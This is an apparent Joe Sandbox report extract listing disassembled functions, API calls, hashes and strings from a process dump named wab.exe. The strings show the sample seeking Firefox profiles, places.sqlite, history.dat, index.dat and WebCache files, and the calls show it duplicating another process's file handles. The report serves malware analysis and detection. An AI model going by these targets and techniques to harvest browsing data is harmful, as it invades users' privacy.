                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                          • String ID:
                                          • API String ID: 2941347001-0
                                          • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                          • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                          • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                          • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                          Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00403C09
                                          • memset.MSVCRT ref: 00403C1E
                                            • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                            • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                          • wcscat.MSVCRT ref: 00403C47
                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                          • wcscat.MSVCRT ref: 00403C70
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memsetwcscat$Closewcscpywcslen
                                          • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                          • API String ID: 3249829328-1174173950
                                          • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                          • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                          • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                          • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                          Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040A824
                                          • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                          • wcscpy.MSVCRT ref: 0040A854
                                          • wcscat.MSVCRT ref: 0040A86A
                                          • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                          • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                          • String ID:
                                          • API String ID: 669240632-0
                                          • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                          • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                          • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                          • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                          Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                          Download Yara Rule
                                          APIs
                                          • wcschr.MSVCRT ref: 00414458
                                          • _snwprintf.MSVCRT ref: 0041447D
                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                          • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: PrivateProfileString$Write_snwprintfwcschr
                                          • String ID: "%s"
                                          • API String ID: 1343145685-3297466227
                                          • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                          • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                          • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                          • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                          Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                          • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                          • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AddressHandleModuleProcProcessTimes
                                          • String ID: GetProcessTimes$kernel32.dll
                                          • API String ID: 1714573020-3385500049
                                          • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                          • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                          • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                          • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                          Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 004087D6
                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                            • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                          • memset.MSVCRT ref: 00408828
                                          • memset.MSVCRT ref: 00408840
                                          • memset.MSVCRT ref: 00408858
                                          • memset.MSVCRT ref: 00408870
                                          • memset.MSVCRT ref: 00408888
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                          • String ID:
                                          • API String ID: 2911713577-0
                                          • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                          • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                          • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                          • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                          Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcmp
                                          • String ID: @ $SQLite format 3
                                          • API String ID: 1475443563-3708268960
                                          • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                          • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                          • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                          • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                          Function 00414C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                          • memset.MSVCRT ref: 00414C87
                                          • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                          • wcscpy.MSVCRT ref: 00414CFC
                                            • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                          Strings
                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AddressCloseProcVersionmemsetwcscpy
                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                          • API String ID: 2705122986-2036018995
                                          • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                          • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                          • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                          • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                          Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _wcsicmpqsort
                                          • String ID: /nosort$/sort
                                          • API String ID: 1579243037-1578091866
                                          • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                          • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                          • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                          • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                          Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040E60F
                                          • memset.MSVCRT ref: 0040E629
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                          Strings
                                          • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                          • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                          • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                          • API String ID: 3354267031-2114579845
                                          • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                          • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                          • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                          • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                          Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                          Download Yara Rule
                                          APIs
                                          • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                          • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                          • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                          • LockResource.KERNEL32(00000000), ref: 004148EF
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Resource$FindLoadLockSizeof
                                          • String ID:
                                          • API String ID: 3473537107-0
                                          • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                          • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                          • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                          • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                          Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                          • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                          • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                          • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                          Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset
                                          • String ID: only a single result allowed for a SELECT that is part of an expression
                                          • API String ID: 2221118986-1725073988
                                          • Opcode ID: 048d8ebac314828999dc99bd83d8a91ef0803223d3a13c5c6c473df875debe00
                                          • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                          • Opcode Fuzzy Hash: 048d8ebac314828999dc99bd83d8a91ef0803223d3a13c5c6c473df875debe00
                                          • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                          Function 004175B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Sleep.KERNEL32(00000064), ref: 004175D0
                                          • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ChangeCloseFindNotificationSleep
                                          • String ID: }A
                                          • API String ID: 1821831730-2138825249
                                          • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                          • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                          • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                          • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                          Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@DeleteObject
                                          • String ID: r!A
                                          • API String ID: 1103273653-628097481
                                          • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                          • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                          • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                          • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                          Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??2@
                                          • String ID:
                                          • API String ID: 1033339047-0
                                          • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                          • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                          • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                          • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                          Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                          • memcmp.MSVCRT ref: 00444BA5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AddressProc$memcmp
                                          • String ID: $$8
                                          • API String ID: 2808797137-435121686
                                          • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                          • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                          • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                          • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                          Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                            • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                            • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                            • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                            • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                            • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                            • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                            • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                            • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                          • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                            • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                            • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                            • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                          • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                          • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                            • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                            • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                            • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                          • String ID:
                                          • API String ID: 1042154641-0
                                          • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                          • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                          • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                          • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                          Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                          • memset.MSVCRT ref: 00403A55
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                          • String ID: history.dat$places.sqlite
                                          • API String ID: 3093078384-467022611
                                          • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                          • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                          • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                          • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                          Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                          • GetLastError.KERNEL32 ref: 00417627
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ErrorLast$File$PointerRead
                                          • String ID:
                                          • API String ID: 839530781-0
                                          • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                          • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                          • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                          • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                          Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FileFindFirst
                                          • String ID: *.*$index.dat
                                          • API String ID: 1974802433-2863569691
                                          • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                          • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                          • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                          • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                          Function 004099F4 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@mallocmemcpy
                                          • String ID:
